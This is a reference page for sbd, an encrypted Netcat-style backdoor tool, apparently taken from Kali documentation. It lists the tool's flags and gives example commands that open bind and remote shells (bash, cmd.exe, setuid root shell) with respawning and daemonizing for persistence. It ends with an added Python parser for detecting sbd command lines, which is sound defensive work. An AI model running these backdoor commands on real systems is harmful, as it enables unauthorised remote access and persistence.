
sbd

sbd is a secure Netcat-clone that provides strong encryption for backdoor access on Linux and Windows systems. It supports program execution, source port selection, and continuous reconnection.

Description

sbd serves as a portable backdoor tool for Unix-like systems and Microsoft Win32, featuring AES-CBC-128 + HMAC-SHA1 encryption. It is designed for secure remote access with capabilities like executing programs upon connection and handling TCP/IP communication exclusively. Common use cases include establishing encrypted shells or command execution in penetration testing scenarios.

The tool allows listening for incoming connections or connecting outbound, with options for respawning connections and daemonizing. It supports invoking shells directly, particularly useful when setuid root for privileged access. Additional features include immobility timeouts and background operation, making it reliable for persistent access.

sbd is lightweight, with an installed size of 163 KB, and depends on libc6. It is licensed under the GNU General Public License.

How It Works

sbd operates over TCP/IP using AES-CBC-128 + HMAC-SHA1 for encryption when enabled. In listen mode (-l), it binds to a specified port (-p) and address (-a), executing a program like bash (-e) upon connection. Client mode connects to a host and port, establishing an encrypted tunnel for command execution or shell interaction. Features like -r enable reconnection attempts with delays, while -D daemonizes the process. Unix-specific options like -s invoke shells directly.

Installation

sudo apt install sbd

Flags

-l           listen for incoming connection
-p n         choose port to listen on, or source port to connect out from
-a address   choose an address to listen on or connect out from
-e prog      program to execute after connect (e.g. -e cmd.exe or -e bash)
-r n         infinitely respawn/reconnect, pause for n seconds between connection attempts. -r0 can be used to re-listen after disconnect (just like a regular daemon)
-c on|off    encryption on/off
-s           invoke a shell, nothing else. if sbd is setuid 0, it'll invoke a root shell
-w n         "immobility timeout" in seconds for idle read/write operations and program execution (the -e option)
-D on|off    fork and run in background (daemonize). default: -D off
-v           display verbose output
-n           no name resolution

Examples

On the server, listen for a connection (-l) on port 4444 (-p 4444), execute bash on connection (-e bash) and display verbose output (-v) with no name resolution (-n). Outputs: listening on port 4444
sbd -l -p 4444 -e bash -v -n
On the client, connect to the remote server IP address (192.168.1.202) and port (4444). Allows executing commands like 'id' which returns uid=0(root) gid=0(root) groups=0(root)
sbd 192.168.1.202 4444
Display help output showing usage for connect and listen modes, along with all available options
sbd -h
Listen on port 4444, execute bash on connect, and infinitely respawn/reconnect with 5-second pauses between attempts
sbd -l -p 4444 -e bash -r 5
Listen on port 4444, invoke a shell (-s), and daemonize the process (-D on)
sbd -l -p 4444 -s -D on
Listen on port 4444 for Windows, execute cmd.exe on connect with encryption enabled (-c on)
sbd -l -p 4444 -e cmd.exe -c on
Connect to host 192.168.1.202 port 4444 using source port 12345
sbd 192.168.1.202 4444 -p 12345
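
For triage of process listings or execve audit records, the flag table above can be turned into a small command-line parser that reports what an sbd instance was started to do. This is an added example, not part of sbd or of the original page; the names parse_sbd and findings and the sample command lines are constructed for illustration, and matching on the binary name sbd assumes it has not been renamed.

```python
import shlex

# Flags from the table on this page; VALUE_FLAGS take an argument (-r 5 or -r0).
VALUE_FLAGS = {"-p", "-a", "-e", "-r", "-c", "-w", "-D"}
BARE_FLAGS = {"-l", "-s", "-v", "-n", "-h"}

def parse_sbd(cmdline):
    """Parse one command line into a dict of options, or None if it is not sbd."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "sbd":
        return None
    opts, i = {"target": []}, 1
    while i < len(argv):
        tok = argv[i]
        if tok[:2] in VALUE_FLAGS:
            if len(tok) > 2:                # value attached to the flag, e.g. -r0
                opts[tok[:2]] = tok[2:]
            elif i + 1 < len(argv):         # value in the next token, e.g. -r 5
                i += 1
                opts[tok[:2]] = argv[i]
        elif tok in BARE_FLAGS:
            opts[tok] = True
        elif not tok.startswith("-"):
            opts["target"].append(tok)      # host and port in connect mode
        i += 1
    return opts

def findings(cmdline):
    """Return triage notes for one command line (empty list if it is not sbd)."""
    o = parse_sbd(cmdline)
    if o is None:
        return []
    if "-l" in o:
        where = f"listener on port {o.get('-p', '?')}"
    else:
        where = "outbound to " + ":".join(o["target"][:2])
    checks = [
        ("-l" in o or len(o["target"]) >= 2, where),
        ("-e" in o, f"executes {o.get('-e')} on connect"),
        ("-s" in o, "invokes a shell (root shell if sbd is setuid 0)"),
        ("-r" in o, f"respawns, {o.get('-r')}s between attempts"),
        (o.get("-D") == "on", "daemonized"),
        (o.get("-c") == "off", "encryption off"),
    ]
    return [msg for cond, msg in checks if cond]
# Constructed sample process command lines (not captured from a real host).
SAMPLE = ["sbd -l -p 4444 -e bash -r 5", "sshd -D", "sbd 192.168.1.202 4444 -p 12345"]
if __name__ == "__main__":
    print("\n".join(f"{s} -> {findings(s)}" for s in SAMPLE))
```
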
Updated 2026-04-16 (source: kali.org)